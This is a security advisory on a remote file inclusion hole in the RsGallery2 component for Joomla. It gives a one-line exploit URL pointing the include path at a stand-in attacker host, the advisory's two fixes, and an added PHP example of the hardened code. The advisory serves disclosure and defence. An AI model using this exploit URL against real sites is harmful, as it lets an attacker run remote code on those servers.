RsGallery2 for Joomla

---------------------------------------------------------------------------

Discovered : marriottvn
Remote     : Yes
Level      : High

---------------------------------------------------------------------------

Affected software description :

Application : RsGallery2
Version     : latest version [ 1.11.2 ]
Description : component for Joomla
URL         : http://rsdev.nl

----------------------------------------------------------------------------

Vulnerable file :

rsgallery2.html.php

----------------------------------------------------------------------------

Exploit:

http://[sitepath]/[joomlapath]/components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://[attacker]

----------------------------------------------------------------------------

Fix:
1. Declare the variable $mosConfig_absolute_path

or

2. Add at the top of the file:

defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );
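As an added illustration (not code from the original advisory and not RsGallery2's own source), here is the include pattern that leaves an undeclared $mosConfig_absolute_path under the request's control, followed by the same file with the advisory's two fixes applied. It assumes the environment the advisory was written against: Joomla 1.0 on PHP with register_globals enabled, where any request parameter becomes a global variable unless the script assigns it first. The helper file name includes/gallery_helper.php and the rsg_safe_include() function are hypothetical.

```php
<?php
// Added illustration, not RsGallery2's own code. Assumes Joomla 1.0 on PHP with
// register_globals=On, so every request parameter is a global variable unless
// the script assigns that variable itself. File names below are hypothetical.

// ---- Exposed form (constructed) -------------------------------------------
// Nothing in this file sets $mosConfig_absolute_path. Requested directly, the
// file relies on the request to supply it, and an include whose prefix is an
// "http://..." URL fetches remote code whenever PHP's allow_url_fopen (PHP 4)
// or allow_url_include (PHP 5.2+) permits it. Kept as a comment so this file
// never executes it:
//
//   require_once( $mosConfig_absolute_path . '/includes/gallery_helper.php' );

// ---- Hardened form ---------------------------------------------------------

// Fix 2 from the advisory: refuse direct access. Joomla 1.0's index.php defines
// _VALID_MOS before it loads any component, so a request that reaches this file
// without passing through index.php stops here, before any include runs.
defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );

// Fix 1 from the advisory: declare the variable so the request cannot. Deriving
// the path from this file's own location on disk ties the value to the
// installation layout rather than to the query string. (Assumes the file sits
// two directories below the Joomla root, as components/com_rsgallery2/ does.)
$mosConfig_absolute_path = realpath( dirname( __FILE__ ) . '/../..' );

// Hypothetical helper: include only an existing local path under the computed
// root, so a later overwrite of the variable still cannot pull in remote or
// out-of-tree code.
function rsg_safe_include( $root, $relative )
{
    $target = realpath( $root . '/' . $relative );
    if ( $target === false || strpos( $target, $root . DIRECTORY_SEPARATOR ) !== 0 ) {
        die( 'Refusing to include a path outside the site root.' );
    }
    require_once( $target );
}

rsg_safe_include( $mosConfig_absolute_path, 'includes/gallery_helper.php' );
```

Either fix alone closes the hole the advisory describes; applying both means a direct request is rejected before any include, and a request routed through index.php still cannot change where the include resolves. Disabling register_globals removes the root cause for every file at once.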
----------------------------------------------------------------------------

Contact:

Nick   : marriottvn
E-mail : i_love_lonely_girl[at]yahoo.com
Web    : http://vnsecurity.com

Greetz to: VnRekcah

# milw0rm.com [2006-06-28]